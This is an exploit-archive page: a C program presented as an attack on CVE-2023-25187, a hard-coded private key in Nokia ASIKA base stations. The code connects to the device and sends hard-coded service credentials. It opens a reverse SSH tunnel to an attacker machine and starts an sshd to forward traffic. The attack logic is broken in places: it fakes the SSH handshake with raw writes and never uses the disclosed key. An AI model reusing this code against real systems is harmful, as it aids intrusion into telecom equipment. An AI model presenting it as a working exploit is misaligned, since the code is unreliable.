Nokia ASIKA 7.13.52 Private Key Disclosure

// Exploit Title: Nokia ASIKA 7.13.52 - Hard-coded private key disclosure// Date: 2023-06-20// Exploit Author: Amirhossein Bahramizadeh// Category : Hardware// Vendor Homepage: https://www.nokia.com/about-us/security-and-privacy/product-security-advisory/cve-2023-25187/// Version: 7.13.52 (REQUIRED)// Tested on: Windows/Linux// CVE : CVE-2023-25187#include <stdio.h>#include <stdlib.h>#include <string.h>#include <errno.h>#include <unistd.h>#include <netinet/in.h>#include <arpa/inet.h>#include <sys/socket.h>#include <sys/types.h>#include <sys/wait.h>#include <signal.h>// The IP address of the vulnerable devicechar *host = "192.168.1.1";// The default SSH port numberint port = 22;// The username and password for the BTS service user accountchar *username = "service_user";char *password = "password123";// The IP address of the attacker's machinechar *attacker_ip = "10.0.0.1";// The port number to use for the MITM attackint attacker_port = 2222;// The maximum length of a message#define MAX_LEN 1024// Forward data between two socketsvoid forward_data(int sock1, int sock2){    char buffer[MAX_LEN];    ssize_t bytes_read;    while ((bytes_read = read(sock1, buffer, MAX_LEN)) > 0)    {        write(sock2, buffer, bytes_read);    }}int main(){    int sock, pid1, pid2;    struct sockaddr_in addr;    char *argv[] = {"/usr/bin/ssh", "-l", username, "-p", "2222", "-o", "StrictHostKeyChecking=no", "-o", "UserKnownHostsFile=/dev/null", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-i", "/path/to/private/key", "-N", "-R", "2222:localhost:22", host, NULL};    // Create a new socket    sock = socket(AF_INET, SOCK_STREAM, 0);    // Set the address to connect to    memset(&addr, 0, sizeof(addr));    addr.sin_family = AF_INET;    addr.sin_port = htons(port);    inet_pton(AF_INET, host, &addr.sin_addr);    // Connect to the vulnerable device    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0)    {        fprintf(stderr, "Error connecting to %s:%d: %s\n", host, port, strerror(errno));        exit(1);    }    // Send the SSH handshake    write(sock, "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10\r\n", 42);    read(sock, NULL, 0);    // Send the username    write(sock, username, strlen(username));    write(sock, "\r\n", 2);    read(sock, NULL, 0);    // Send the password    write(sock, password, strlen(password));    write(sock, "\r\n", 2);    // Wait for the authentication to complete    sleep(1);    // Start an SSH client on the attacker's machine    pid1 = fork();    if (pid1 == 0)    {        execv("/usr/bin/ssh", argv);        exit(0);    }    // Start an SSH server on the attacker's machine    pid2 = fork();    if (pid2 == 0)    {        execl("/usr/sbin/sshd", "/usr/sbin/sshd", "-p", "2222", "-o", "StrictModes=no", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-o", "AuthorizedKeysFile=/dev/null", "-o", "HostKey=/path/to/private/key", NULL);        exit(0);    }    // Wait for the SSH server to start    sleep(1);    // Forward data between the client and the server    pid1 = fork();    if (pid1 == 0)    {        forward_data(sock, STDIN_FILENO);        exit(0);    }    pid2 = fork();    if (pid2 == 0)    {        forward_data(STDOUT_FILENO, sock);        exit(0);    }    // Wait for the child processes to finish    waitpid(pid1, NULL, 0);    waitpid(pid2, NULL, 0);    // Close the socket    close(sock);    return 0;}